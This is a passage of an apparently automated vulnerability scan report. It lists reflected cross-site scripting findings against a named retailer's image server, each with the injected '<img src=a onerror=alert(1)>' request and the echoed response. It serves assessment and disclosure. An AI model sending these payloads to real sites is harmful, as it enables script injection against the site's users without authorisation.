GET /is/image/pacsun/headerEmailV3_envelope82005<img%20src%3da%20onerror%3dalert(1)>f7417a937a?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/headerEmailV3_envelope82005<img src=a onerror=alert(1)>f7417a937a

3.101. http://images3.pacsun.com/is/image/pacsun/homeBTF1_090611 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homeBTF1_090611

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf11a<img%20src%3da%20onerror%3dalert(1)>b2a55de1d7f was submitted in the REST URL parameter 4. This input was echoed as bf11a<img src=a onerror=alert(1)>b2a55de1d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homeBTF1_090611bf11a<img%20src%3da%20onerror%3dalert(1)>b2a55de1d7f?&$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:10 GMT
Connection: close

Unable to find /pacsun/homeBTF1_090611bf11a<img src=a onerror=alert(1)>b2a55de1d7f

3.102. http://images3.pacsun.com/is/image/pacsun/homeBTF2_092011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homeBTF2_092011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f66e<img%20src%3da%20onerror%3dalert(1)>4eb36ef817c was submitted in the REST URL parameter 4. This input was echoed as 6f66e<img src=a onerror=alert(1)>4eb36ef817c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homeBTF2_0920116f66e<img%20src%3da%20onerror%3dalert(1)>4eb36ef817c?&$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:07 GMT
Connection: close

Unable to find /pacsun/homeBTF2_0920116f66e<img src=a onerror=alert(1)>4eb36ef817c

3.103. http://images3.pacsun.com/is/image/pacsun/homeMainA_093011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homeMainA_093011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35fb9<img%20src%3da%20onerror%3dalert(1)>77ca712fdaa was submitted in the REST URL parameter 4. This input was echoed as 35fb9<img src=a onerror=alert(1)>77ca712fdaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/homeMainA_09301135fb9<img%20src%3da%20onerror%3dalert(1)>77ca712fdaa?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:10 GMT
Connection: close

Unable to find /pacsun/homeMainA_09301135fb9<img src=a onerror=alert(1)>77ca712fdaa

3.104. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/logo_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a524<img%20src%3da%20onerror%3dalert(1)>285e07c9753 was submitted in the REST URL parameter 4. This input was echoed as 8a524<img src=a onerror=alert(1)>285e07c9753 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/logo_v38a524<img%20src%3da%20onerror%3dalert(1)>285e07c9753?$img_png-alpha$&$ext=.png HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 74
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:56 GMT
Connection: close

Unable to find /pacsun/logo_v38a524<img src=a onerror=alert(1)>285e07c9753

3.105. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_arrivals3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec7f7<img%20src%3da%20onerror%3dalert(1)>042a2b90b3c was submitted in the REST URL parameter 4. This input was echoed as ec7f7<img src=a onerror=alert(1)>042a2b90b3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_arrivals3Offec7f7<img%20src%3da%20onerror%3dalert(1)>042a2b90b3c?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/mainNav2_arrivals3Offec7f7<img src=a onerror=alert(1)>042a2b90b3c

3.106. http://images3.pacsun.com/is/image/pacsun/mainNav2_blog5Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_blog5Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33c3<img%20src%3da%20onerror%3dalert(1)>81badf9861 was submitted in the REST URL parameter 4. This input was echoed as b33c3<img src=a onerror=alert(1)>81badf9861 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_blog5Offb33c3<img%20src%3da%20onerror%3dalert(1)>81badf9861?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/mainNav2_blog5Offb33c3<img src=a onerror=alert(1)>81badf9861

3.107. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_brands3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8889d<img%20src%3da%20onerror%3dalert(1)>01d9ca41aeb was submitted in the REST URL parameter 4. This input was echoed as 8889d<img src=a onerror=alert(1)>01d9ca41aeb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_brands3Off8889d<img%20src%3da%20onerror%3dalert(1)>01d9ca41aeb?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/mainNav2_brands3Off8889d<img src=a onerror=alert(1)>01d9ca41aeb

3.108. http://images3.pacsun.com/is/image/pacsun/mainNav2_denim3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_denim3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4936<img%20src%3da%20onerror%3dalert(1)>a8983b2e578 was submitted in the REST URL parameter 4. This input was echoed as d4936<img src=a onerror=alert(1)>a8983b2e578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_denim3Offd4936<img%20src%3da%20onerror%3dalert(1)>a8983b2e578?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:57 GMT
Connection: close

Unable to find /pacsun/mainNav2_denim3Offd4936<img src=a onerror=alert(1)>a8983b2e578

3.109. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_mens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53e9d<img%20src%3da%20onerror%3dalert(1)>9227fd9ac38 was submitted in the REST URL parameter 4. This input was echoed as 53e9d<img src=a onerror=alert(1)>9227fd9ac38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_mens3Off53e9d<img%20src%3da%20onerror%3dalert(1)>9227fd9ac38?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:56 GMT
Connection: close

Unable to find /pacsun/mainNav2_mens3Off53e9d<img src=a onerror=alert(1)>9227fd9ac38

3.110. http://images3.pacsun.com/is/image/pacsun/mainNav2_music3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_music3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7564<img%20src%3da%20onerror%3dalert(1)>ae4a8344046 was submitted in the REST URL parameter 4. This input was echoed as d7564<img src=a onerror=alert(1)>ae4a8344046 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_music3Offd7564<img%20src%3da%20onerror%3dalert(1)>ae4a8344046?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/mainNav2_music3Offd7564<img src=a onerror=alert(1)>ae4a8344046

3.111. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_sale3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80c46<img%20src%3da%20onerror%3dalert(1)>de7e3ff4af6 was submitted in the REST URL parameter 4. This input was echoed as 80c46<img src=a onerror=alert(1)>de7e3ff4af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_sale3Off80c46<img%20src%3da%20onerror%3dalert(1)>de7e3ff4af6?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/mainNav2_sale3Off80c46<img src=a onerror=alert(1)>de7e3ff4af6

3.112. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_shoes3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7ba4<img%20src%3da%20onerror%3dalert(1)>e2aa5885018 was submitted in the REST URL parameter 4. This input was echoed as d7ba4<img src=a onerror=alert(1)>e2aa5885018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_shoes3Offd7ba4<img%20src%3da%20onerror%3dalert(1)>e2aa5885018?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/mainNav2_shoes3Offd7ba4<img src=a onerror=alert(1)>e2aa5885018

3.113. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_womens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3add1<img%20src%3da%20onerror%3dalert(1)>28f4f2fac2 was submitted in the REST URL parameter 4. This input was echoed as 3add1<img src=a onerror=alert(1)>28f4f2fac2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_womens3Off3add1<img%20src%3da%20onerror%3dalert(1)>28f4f2fac2?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:57 GMT
Connection: close

Unable to find /pacsun/mainNav2_womens3Off3add1<img src=a onerror=alert(1)>28f4f2fac2

3.114. http://images3.pacsun.com/is/image/pacsun/mensMega_092811b [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mensMega_092811b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload afdad<img%20src%3da%20onerror%3dalert(1)>75e3f56b32f was submitted in the REST URL parameter 4. This input was echoed as afdad<img src=a onerror=alert(1)>75e3f56b32f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mensMega_092811bafdad<img%20src%3da%20onerror%3dalert(1)>75e3f56b32f?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:57 GMT
Connection: close

Unable to find /pacsun/mensMega_092811bafdad<img src=a onerror=alert(1)>75e3f56b32f

3.115. http://images3.pacsun.com/is/image/pacsun/newMega_092811b [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/newMega_092811b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f7f7<img%20src%3da%20onerror%3dalert(1)>ad010335fe7 was submitted in the REST URL parameter 4. This input was echoed as 8f7f7<img src=a onerror=alert(1)>ad010335fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/newMega_092811b8f7f7<img%20src%3da%20onerror%3dalert(1)>ad010335fe7?&$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/newMega_092811b8f7f7<img src=a onerror=alert(1)>ad010335fe7

3.116. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/pop_email_011011b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ca3c<img%20src%3da%20onerror%3dalert(1)>f9e63221fc9 was submitted in the REST URL parameter 4. This input was echoed as 9ca3c<img src=a onerror=alert(1)>f9e63221fc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/pop_email_011011b9ca3c<img%20src%3da%20onerror%3dalert(1)>f9e63221fc9?$img_jpg$&$ext=.jpg HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/pop_email_011011b9ca3c<img src=a onerror=alert(1)>f9e63221fc9

3.117. http://images3.pacsun.com/is/image/pacsun/redesign_social_51811 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/redesign_social_51811

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78570<img%20src%3da%20onerror%3dalert(1)>025efdce66a was submitted in the REST URL parameter 4. This input was echoed as 78570<img src=a onerror=alert(1)>025efdce66a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/redesign_social_5181178570<img%20src%3da%20onerror%3dalert(1)>025efdce66a?$img_gif-alpha$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:08 GMT
Connection: close

Unable to find /pacsun/redesign_social_5181178570<img src=a onerror=alert(1)>025efdce66a

3.118. http://images3.pacsun.com/is/image/pacsun/topNavV3_hdrAccessories10Open [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/topNavV3_hdrAccessories10Open

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b04b3<img%20src%3da%20onerror%3dalert(1)>60a0eba2e53 was submitted in the REST URL parameter 4. This input was echoed as b04b3<img src=a onerror=alert(1)>60a0eba2e53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/topNavV3_hdrAccessories10Openb04b3<img%20src%3da%20onerror%3dalert(1)>60a0eba2e53?$img_gif-alpha$&$ext=.gif-alpha HTTP/1.1
